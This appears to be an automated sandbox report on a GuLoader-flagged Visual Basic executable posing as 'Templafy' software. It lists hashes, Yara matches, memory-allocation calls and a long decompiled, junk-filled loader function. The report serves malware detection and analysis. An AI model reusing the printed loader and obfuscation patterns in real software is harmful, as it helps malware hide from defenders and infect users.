__vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaFpI4, __vbaVarTstGe, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, __vbaFPInt, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Templafy
InternalName	Fort
FileVersion	2.00
CompanyName	Templafy
LegalTrademarks	Templafy
Comments	Templafy
ProductName	Templafy
ProductVersion	2.00
FileDescription	Templafy
OriginalFilename	Fort.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: G47wmLn8uy.exe PID: 6320 Parent PID: 1556

General

Start time:	15:55:19
Start date:	14/12/2021
Path:	C:\Users\user\Desktop\G47wmLn8uy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\G47wmLn8uy.exe"
Imagebase:	0x400000
File size:	167936 bytes
MD5 hash:	9A1518ED709F916360E56B5AC7D76995
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: G47wmLn8uy.exe PID: 6320 Parent PID: 1556 G47wmLn8uy.exeCOMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	13.4%
Signature Coverage:	8.7%
Total number of Nodes:	149
Total number of Limit Nodes:	21

Executed Functions

Function 04D1D38F, Relevance: 1.7, APIs: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 04D1D9F8

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 45029877a25369bc07f7299d7d0a62dd79db470cbe5bd7b337b4765fe17b1654
Instruction ID: f9be098fd41e418071eef35bf7e490a3351c24bdf34c9b54d110d22a6132d9ee
Opcode Fuzzy Hash: 45029877a25369bc07f7299d7d0a62dd79db470cbe5bd7b337b4765fe17b1654
Instruction Fuzzy Hash: FF91D471708248EFDF38DE24E9987EA37A3BF95310F51412ADC4A8B264D730BA41CB12

Uniqueness

Uniqueness Score: -1.00%

Function 04D18255, Relevance: 1.7, APIs: 1, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d984fc5af32cbf21a5b4abffe43c49e0d864a4b3a80c9a17dfb2822a0a5322
Instruction ID: d862a7a22710e4c2875ac6c0758cfae4aa9083032040cd4238fbc525c8d1396a
Opcode Fuzzy Hash: b4d984fc5af32cbf21a5b4abffe43c49e0d864a4b3a80c9a17dfb2822a0a5322
Instruction Fuzzy Hash: 068123B2A053489FDB30EE28DD847DA3BA2FF59310F54811EDC89AB225C7749A41DB52

Uniqueness

Uniqueness Score: -1.00%

Function 04D1838C, Relevance: 1.7, APIs: 1, Instructions: 183
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(61AE9199), ref: 04D1867A

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 8c4f2c1a5ed97bd0449632064e86c170ee4e18e3c3545ab8f6dd08df52115d5d
Instruction ID: f83a47860ed167113b1c24219e3b50cb4fa7f333a348a716e8108ecc1b48b3a0
Opcode Fuzzy Hash: 8c4f2c1a5ed97bd0449632064e86c170ee4e18e3c3545ab8f6dd08df52115d5d
Instruction Fuzzy Hash: C4614471A0A3489FDB30EE28E9803DA3BA2FF5A310F54811EDC899B365C7349951DB12

Uniqueness

Uniqueness Score: -1.00%

Function 04D18498, Relevance: 1.7, APIs: 1, Instructions: 179
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(61AE9199), ref: 04D1867A

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c5afc12697e543a732b6edd0b562e9a8efeffe80b2371c18fafc772c838eda29
Instruction ID: deb60ad083e1f8826965ee351d3edb44296129386e0c469dcb133f76023c37e2
Opcode Fuzzy Hash: c5afc12697e543a732b6edd0b562e9a8efeffe80b2371c18fafc772c838eda29
Instruction Fuzzy Hash: C8614B71A063489FEB20DE34ED853DA3BA2FF59320F51855ADC8A9F364D3349942DB41

Uniqueness

Uniqueness Score: -1.00%

Function 04D18441, Relevance: 1.6, APIs: 1, Instructions: 138
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(61AE9199), ref: 04D1867A

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 939f7f5f85fe526be1f35c7029733cd8d339b347da54ac21d192704544b4f07b
Instruction ID: ec61b6443c4d9cb33e907ad4ce9096ebed5146e397868db51ab9f9635a55a66e
Opcode Fuzzy Hash: 939f7f5f85fe526be1f35c7029733cd8d339b347da54ac21d192704544b4f07b
Instruction Fuzzy Hash: 35512871A053489FEB30EE25ED807DA77A2FF99310F54811EDC899B324D7349981DB52

Uniqueness

Uniqueness Score: -1.00%

Function 04D1841D, Relevance: 1.6, APIs: 1, Instructions: 136
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(61AE9199), ref: 04D1867A

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: ea118b0722048e5d0e5c522428cdc9ba7d29e44773a1b99ebe7b50cfa4e86e95
Instruction ID: 99876d4ff7b1d42cfafd299388a3a77318c02665d2f71d9b7d36f890ee498434
Opcode Fuzzy Hash: ea118b0722048e5d0e5c522428cdc9ba7d29e44773a1b99ebe7b50cfa4e86e95
Instruction Fuzzy Hash: A9512772609385DFEB30AE25ED807DB77A2FF89304F54452EDC899B324D73099819B12

Uniqueness

Uniqueness Score: -1.00%

Function 04D184D9, Relevance: 1.6, APIs: 1, Instructions: 116
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(61AE9199), ref: 04D1867A

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6e819bf56c293593e6f192736006b21c8df9c2915f0e4991e45f682bfa53d69d
Instruction ID: 1bcbcec497cc0d639a30bc91c73f17956ce7ff0a5a5c76de1f2d152833d25c3c
Opcode Fuzzy Hash: 6e819bf56c293593e6f192736006b21c8df9c2915f0e4991e45f682bfa53d69d
Instruction Fuzzy Hash: 194136726053459FEB30AE65ED80BDF77A2FF89314F54852EDC899B320C73099429B52

Uniqueness

Uniqueness Score: -1.00%

Function 04D18551, Relevance: 1.6, APIs: 1, Instructions: 101memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(61AE9199), ref: 04D1867A

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 0fb97f060ab9548835a00219c36264a3b42ab7fa1b74ffbb8992ae17a784c194
Instruction ID: b1c1893dddbc5f8853abca7e8d2260099a48baf706efafbc34090bbf8def8689
Opcode Fuzzy Hash: 0fb97f060ab9548835a00219c36264a3b42ab7fa1b74ffbb8992ae17a784c194
Instruction Fuzzy Hash: 0C31F671A063849FEB30AE65ED807CA3BA2FF8A314F55852ADC8D5B324D73099429B51

Uniqueness

Uniqueness Score: -1.00%

Function 04D18621, Relevance: 1.6, APIs: 1, Instructions: 68memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(61AE9199), ref: 04D1867A

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 52ab5388aedc044b22486921fd3471f9cb20abf05f30bec223d0ea2f92857abd
Instruction ID: c95c44f644f4b3f944b5943cb083384267d3cfc564dc676933e804ca286b1855
Opcode Fuzzy Hash: 52ab5388aedc044b22486921fd3471f9cb20abf05f30bec223d0ea2f92857abd
Instruction Fuzzy Hash: DF215B31A0A345EFDB21EE69D9807CE3B62FF09354F10466EEC499B270D731A941AB51

Uniqueness

Uniqueness Score: -1.00%

Function 04D18663, Relevance: 1.6, APIs: 1, Instructions: 54memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(61AE9199), ref: 04D1867A

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e8559bcde823b51930c9042ff7470351b7eaf357006d02f2b51ac84e21970a35
Instruction ID: 93220607f2d36395d08cb59fc72b1e761cc1d80857bd8322097c6e87655f9c8d
Opcode Fuzzy Hash: e8559bcde823b51930c9042ff7470351b7eaf357006d02f2b51ac84e21970a35
Instruction Fuzzy Hash: B411E335A06249AFDB20EE65E9806CE3762FF09314F104659ED499B330C731A9419B50

Uniqueness

Uniqueness Score: -1.00%

Function 0041FAC7, Relevance: 210.8, APIs: 87, Strings: 33, Instructions: 770
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0041FAC7(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				short _v32;
				char _v36;
				void* _v40;
				void* _v56;
				short _v60;
				short _v64;
				void* _v68;
				short _v72;
				char _v76;
				short _v80;
				intOrPtr _v84;
				short _v104;
				void* _v108;
				void* _v112;
				void* _v116;
				char _v120;
				void* _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				char _v144;
				intOrPtr _v152;
				char _v160;
				intOrPtr _v168;
				char _v176;
				intOrPtr _v184;
				char _v192;
				intOrPtr _v200;
				char _v208;
				char* _v216;
				intOrPtr _v224;
				char _v260;
				void* _v264;
				void* _v268;
				signed int _v272;
				char _v276;
				char _v280;
				char _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int* _t429;
				char* _t436;
				signed int _t454;
				signed int _t467;
				signed int* _t473;
				signed int _t477;
				short _t488;
				short _t490;
				signed int _t496;
				char* _t499;
				signed int _t505;
				short _t507;
				signed int _t511;
				signed int _t524;
				signed int _t525;
				signed int _t529;
				signed int _t538;
				signed int _t543;
				signed int _t548;
				char* _t553;
				signed int _t569;
				signed int _t573;
				signed int* _t581;
				short _t594;
				signed int _t604;
				void* _t605;
				intOrPtr* _t607;
				char* _t641;
				void* _t685;
				void* _t687;
				void* _t688;
				void* _t690;
				intOrPtr _t691;

				_t687 = __esi;
				_t685 = __edi;
				_t691 = _t690 - 0xc;
				 *[fs:0x0] = _t691;
				L004015F0();
				_v16 = _t691;
				_v12 = 0x401260;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015f6, _t688);
				_t429 = _a8;
				 *_t429 =  *_t429 & 0x00000000;
				_push(0);
				_push(0xffffffff);
				_push(L"tunesere");
				_push(L"spillelrernes");
				L00401932();
				if(_t429 >= 0xc4) {
					_push(0xeb);
					_push(0xc7);
					_push(0x20);
					L0040191A();
					_push(_t429);
					L00401920();
					L0040192C();
					_push(_t429);
					_push(L"bindsaalers");
					L00401926();
					L0040192C();
					_push(_t429);
					_push(L"muscularise");
					L00401926();
					L0040192C();
					_push( &_v132);
					_push( &_v128);
					_push(2);
					L00401914();
					L0040190E();
					L0040192C();
					_v216 = L"AFSTNINGSMULIGHEDER";
					_v224 = 8;
					L004018FC();
					_push( &_v160);
					_push( &_v176);
					L00401902();
					_push( &_v176);
					L00401908();
					L0040192C();
					_push( &_v176);
					_push( &_v160);
					_push(2);
					L004018F6();
					_t691 = _t691 + 0x18;
				}
				_v152 = 0xd59d2;
				_v160 = 3;
				L004018F0();
				_v280 = 0x5e0d92;
				_v276 = 0x5a2ed7;
				_t436 =  &_v128;
				L004018EA();
				 *((intOrPtr*)( *_a4 + 0x730))(_a4, _t436, _t436,  &_v176,  &_v276,  &_v280, 0x12f,  &_v132,  &_v176,  &_v160);
				_v308 = _v132;
				_v132 = _v132 & 0x00000000;
				L0040192C();
				L004018E4();
				L004018F6();
				L004018DE();
				L004018DE();
				 *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v128,  &_v132, 0xdb3,  &_v136, 2,  &_v160,  &_v176);
				_v312 = _v136;
				_v136 = _v136 & 0x00000000;
				L0040192C();
				L00401914();
				_t454 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, 2,  &_v128,  &_v132);
				_v288 = _t454;
				if(_v288 >= 0) {
					_v336 = _v336 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v336 = _t454;
				}
				_v268 = 0x972;
				_v264 = 0xedd;
				_v260 = 0x1f39;
				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v260, 0x2bc7,  &_v264,  &_v268, L"Acoemeti9",  &_v272);
				_v104 = _v272;
				L004018DE();
				_t467 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0xe7a,  &_v128,  &_v276);
				_v288 = _t467;
				if(_v288 >= 0) {
					_v340 = _v340 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v340 = _t467;
				}
				_v28 = _v276;
				L004018E4();
				_v216 = L"stipulr";
				_v224 = 8;
				L004018FC();
				L004018D8();
				L004018DE();
				_t473 =  &_v132;
				L004018EA();
				_t477 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v128, _t473, _t473,  &_v176,  &_v260,  &_v176,  &_v160);
				_v288 = _t477;
				if(_v288 >= 0) {
					_v344 = _v344 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v344 = _t477;
				}
				_v80 = _v260;
				L00401914();
				L004018F6();
				_v260 = 0x1c3f;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, L"KABINETTERNES",  &_v260, L"Improver",  &_v264, 2,  &_v160,  &_v176, 2,  &_v128,  &_v132);
				_t488 = _v264;
				_v64 = _t488;
				L004018D2();
				_v264 = _t488;
				L004018CC();
				L0040192C();
				_v316 = _v136;
				_v136 = _v136 & 0x00000000;
				_t490 = _v264;
				_v260 = _t490;
				L004018DE();
				_v276 = 0x5c8fa9;
				L0040192C();
				_t496 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v276,  &_v128,  &_v260, _t490, L"Tresaarsdags", L"SHERIFFESS", 0x31, L"Plaisance");
				_v288 = _t496;
				if(_v288 >= 0) {
					_v348 = _v348 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v348 = _t496;
				}
				_t499 =  &_v128;
				L00401914();
				L004018C6();
				_v280 = _t499;
				L004018C0();
				_v276 = _t499;
				_t505 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 0x1bf1,  &_v276, 0x6417,  &_v280, L"oplrende",  &_v284, L"parisis", L"Unidextrality", 3, _t499,  &_v132,  &_v136);
				_v288 = _t505;
				if(_v288 >= 0) {
					_v352 = _v352 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v352 = _t505;
				}
				_v84 = _v284;
				_v152 = 0x80020004;
				_v160 = 0xa;
				_t507 =  &_v160;
				L004018BA();
				_v260 = _t507;
				_t511 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, L"SINGALESERNES", _v260,  &_v276, _t507);
				_v288 = _t511;
				if(_v288 >= 0) {
					_v356 = _v356 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v356 = _t511;
				}
				_v76 = _v276;
				L00401938();
				L004018B4();
				L0040192C();
				_v320 = _v132;
				_v132 = _v132 & 0x00000000;
				L0040192C();
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v128, 0x19be, 0x5b4e,  &_v260, L"Nonincrimination5");
				_v72 = _v260;
				L00401914();
				_t524 =  *((intOrPtr*)( *_a4 + 0x714))(_a4, 2,  &_v128,  &_v132);
				_v288 = _t524;
				if(_v288 >= 0) {
					_v360 = _v360 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v360 = _t524;
				}
				L004018D2();
				_v272 = _t524;
				L004018A8();
				_t525 =  &_v144;
				L004018AE();
				_v288 = _t525;
				_t529 =  *((intOrPtr*)( *_v288 + 0x1c))(_v288,  &_v276, _t525, _t524, L"BELLBIRD");
				asm("fclex");
				_v292 = _t529;
				if(_v292 >= 0) {
					_v364 = _v364 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x403ae8);
					_push(_v288);
					_push(_v292);
					L0040193E();
					_v364 = _t529;
				}
				_v268 = 0x4091;
				_v264 = 0x6b1b;
				L004018DE();
				_v260 = _v272;
				_t538 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v260,  &_v128,  &_v264,  &_v268, _v276,  &_v132);
				_v296 = _t538;
				if(_v296 >= 0) {
					_v368 = _v368 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x40364c);
					_push(_a4);
					_push(_v296);
					L0040193E();
					_v368 = _t538;
				}
				_v324 = _v132;
				_v132 = _v132 & 0x00000000;
				L0040192C();
				L004018E4();
				L004018A2();
				_v276 = 0x6f1327;
				_t543 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, 0x26f, L"MOTELS", 0x2168,  &_v276, 0x4131);
				_v288 = _t543;
				if(_v288 >= 0) {
					_v372 = _v372 & 0x00000000;
				} else {
					_push(0x71c);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v372 = _t543;
				}
				_v260 = 0x303e;
				_t548 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, 0x12f,  &_v260,  &_v264);
				_v288 = _t548;
				if(_v288 >= 0) {
					_v376 = _v376 & 0x00000000;
				} else {
					_push(0x720);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v376 = _t548;
				}
				_v32 = _v264;
				_v152 = 0xed;
				_v160 = 2;
				L0040189C();
				_v184 = 0x80020004;
				_v192 = 0xa;
				L00401908();
				L0040192C();
				L004018DE();
				_v260 = 0x52d9;
				_t553 =  &_v192;
				L004018BA();
				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v260,  &_v128, L"JAGER",  &_v132, _t553, _t553,  &_v176,  &_v176,  &_v160);
				L00401914();
				L004018F6();
				_v260 = 0x4747;
				_v276 = 0x7668ba;
				_t569 =  *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v276, 0x82ad73,  &_v260, 3,  &_v160,  &_v192,  &_v176, 2,  &_v128,  &_v132);
				_v288 = _t569;
				if(_v288 >= 0) {
					_v380 = _v380 & 0x00000000;
				} else {
					_push(0x724);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v380 = _t569;
				}
				_t573 =  *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v276);
				_v288 = _t573;
				if(_v288 >= 0) {
					_v384 = _v384 & 0x00000000;
				} else {
					_push(0x728);
					_push(0x40364c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v384 = _t573;
				}
				_v120 = _v276;
				_v168 = 0x5d;
				_v176 = 2;
				_v216 = L"Elskovsrytmes7";
				_v224 = 8;
				L004018FC();
				L00401896();
				_v200 = 0x1429a;
				_v208 = 3;
				L00401890();
				L0040192C();
				_v328 = _v140;
				_v140 = _v140 & 0x00000000;
				_v276 = 0xcfeba;
				L00401908();
				L0040192C();
				_t581 =  &_v136;
				L0040192C();
				 *((intOrPtr*)( *_a4 + 0x748))(_a4,  &_v128, L"Enjoyable",  &_v276, _t581, _t581,  &_v192,  &_v208, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe,  &_v192,  &_v160, 0x41,  &_v176);
				_v332 = _v136;
				_v136 = _v136 & 0x00000000;
				_t641 =  &_v36;
				L0040192C();
				L00401914();
				_t594 =  &_v160;
				L004018F6();
				L004018D2();
				_v268 = _t594;
				_v260 = _v268;
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, 0x153d9c, 0xa6b,  &_v260,  &_v264, L"Hyrernes", 4, _t594,  &_v176,  &_v208,  &_v192, 3,  &_v128,  &_v132,  &_v140);
				_v60 = _v264;
				_t604 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
				asm("fclex");
				_v288 = _t604;
				if(_v288 >= 0) {
					_v388 = _v388 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x40361c);
					_push(_a4);
					_push(_v288);
					L0040193E();
					_v388 = _t604;
				}
				_v36 = 0x413665;
				_t605 = _v36(_t685, _t687, 4, 0);
				asm("sti");
				asm("adc dh, bh");
				 *((intOrPtr*)(_t641 - 0xd37b)) =  *((intOrPtr*)(_t641 - 0xd37b)) - 1;
				asm("invalid");
				_t607 = _t605 + _t641 +  *((intOrPtr*)(_t605 + _t641));
				 *_t607 =  *_t607 + _t607;
				L0040188A();
				_push(0x420853);
				L004018E4();
				L004018E4();
				L00401938();
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				return _t607;
			}

0x0041fac7
0x0041fac7
0x0041faca
0x0041fad9
0x0041fae5
0x0041faed
0x0041faf0
0x0041faf7
0x0041fb06
0x0041fb09
0x0041fb0c
0x0041fb0f
0x0041fb11
0x0041fb13
0x0041fb18
0x0041fb1d
0x0041fb27
0x0041fb2d
0x0041fb32
0x0041fb37
0x0041fb39
0x0041fb3e
0x0041fb3f
0x0041fb49
0x0041fb4e
0x0041fb4f
0x0041fb54
0x0041fb5e
0x0041fb63
0x0041fb64
0x0041fb69
0x0041fb73
0x0041fb7b
0x0041fb7f
0x0041fb80
0x0041fb82
0x0041fb8a
0x0041fb94
0x0041fb99
0x0041fba3
0x0041fbb9
0x0041fbc4
0x0041fbcb
0x0041fbcc
0x0041fbd7
0x0041fbd8
0x0041fbe2
0x0041fbed
0x0041fbf4
0x0041fbf5
0x0041fbf7
0x0041fbfc
0x0041fbfc
0x0041fbff
0x0041fc09
0x0041fc21
0x0041fc26
0x0041fc30
0x0041fc58
0x0041fc5c
0x0041fc6a
0x0041fc73
0x0041fc79
0x0041fc86
0x0041fc8e
0x0041fca3
0x0041fcb3
0x0041fcc0
0x0041fce1
0x0041fced
0x0041fcf3
0x0041fd03
0x0041fd12
0x0041fd22
0x0041fd28
0x0041fd35
0x0041fd57
0x0041fd37
0x0041fd37
0x0041fd3c
0x0041fd41
0x0041fd44
0x0041fd4a
0x0041fd4f
0x0041fd4f
0x0041fd5e
0x0041fd67
0x0041fd70
0x0041fda7
0x0041fdb4
0x0041fdc0
0x0041fddd
0x0041fde3
0x0041fdf0
0x0041fe12
0x0041fdf2
0x0041fdf2
0x0041fdf7
0x0041fdfc
0x0041fdff
0x0041fe05
0x0041fe0a
0x0041fe0a
0x0041fe1f
0x0041fe25
0x0041fe2a
0x0041fe34
0x0041fe4a
0x0041fe5d
0x0041fe6a
0x0041fe7d
0x0041fe81
0x0041fe93
0x0041fe99
0x0041fea6
0x0041fec8
0x0041fea8
0x0041fea8
0x0041fead
0x0041feb2
0x0041feb5
0x0041febb
0x0041fec0
0x0041fec0
0x0041fed6
0x0041fee4
0x0041fefc
0x0041ff04
0x0041ff2d
0x0041ff33
0x0041ff3a
0x0041ff43
0x0041ff48
0x0041ff56
0x0041ff63
0x0041ff6e
0x0041ff74
0x0041ff7b
0x0041ff82
0x0041ff91
0x0041ff96
0x0041ffae
0x0041ffce
0x0041ffd4
0x0041ffe1
0x00420003
0x0041ffe3
0x0041ffe3
0x0041ffe8
0x0041ffed
0x0041fff0
0x0041fff6
0x0041fffb
0x0041fffb
0x00420015
0x0042001b
0x00420028
0x0042002d
0x00420038
0x0042003d
0x0042006f
0x00420075
0x00420082
0x004200a4
0x00420084
0x00420084
0x00420089
0x0042008e
0x00420091
0x00420097
0x0042009c
0x0042009c
0x004200b1
0x004200b4
0x004200be
0x004200c8
0x004200cf
0x004200d4
0x004200f5
0x004200fb
0x00420108
0x0042012a
0x0042010a
0x0042010a
0x0042010f
0x00420114
0x00420117
0x0042011d
0x00420122
0x00420122
0x00420137
0x00420140
0x0042014a
0x00420154
0x0042015c
0x00420162
0x0042016f
0x00420191
0x0042019e
0x004201ac
0x004201bc
0x004201c2
0x004201cf
0x004201f1
0x004201d1
0x004201d1
0x004201d6
0x004201db
0x004201de
0x004201e4
0x004201e9
0x004201e9
0x004201fd
0x00420202
0x00420209
0x0042020f
0x00420216
0x0042021b
0x00420236
0x00420239
0x0042023b
0x00420248
0x0042026a
0x0042024a
0x0042024a
0x0042024c
0x00420251
0x00420257
0x0042025d
0x00420262
0x00420262
0x00420271
0x0042027a
0x0042028b
0x00420297
0x004202c9
0x004202cf
0x004202dc
0x004202fe
0x004202de
0x004202de
0x004202e3
0x004202e8
0x004202eb
0x004202f1
0x004202f6
0x004202f6
0x00420308
0x0042030e
0x0042031b
0x00420323
0x0042032e
0x00420333
0x00420360
0x00420366
0x00420373
0x00420395
0x00420375
0x00420375
0x0042037a
0x0042037f
0x00420382
0x00420388
0x0042038d
0x0042038d
0x0042039c
0x004203c0
0x004203c6
0x004203d3
0x004203f5
0x004203d5
0x004203d5
0x004203da
0x004203df
0x004203e2
0x004203e8
0x004203ed
0x004203ed
0x00420403
0x00420407
0x00420411
0x00420429
0x0042042e
0x00420438
0x00420449
0x00420453
0x00420460
0x00420465
0x0042046e
0x00420475
0x00420497
0x004204a7
0x004204c6
0x004204ce
0x004204d7
0x004204fc
0x00420502
0x0042050f
0x00420531
0x00420511
0x00420511
0x00420516
0x0042051b
0x0042051e
0x00420524
0x00420529
0x00420529
0x00420547
0x0042054d
0x0042055a
0x0042057c
0x0042055c
0x0042055c
0x00420561
0x00420566
0x00420569
0x0042056f
0x00420574
0x00420574
0x00420589
0x0042058c
0x00420596
0x004205a0
0x004205aa
0x004205c0
0x004205dc
0x004205e1
0x004205eb
0x00420604
0x00420611
0x0042061c
0x00420622
0x00420629
0x0042063a
0x00420644
0x00420649
0x00420659
0x00420677
0x00420683
0x00420689
0x00420696
0x00420699
0x004206af
0x004206cc
0x004206d5
0x004206e2
0x004206e7
0x004206f5
0x0042071c
0x00420729
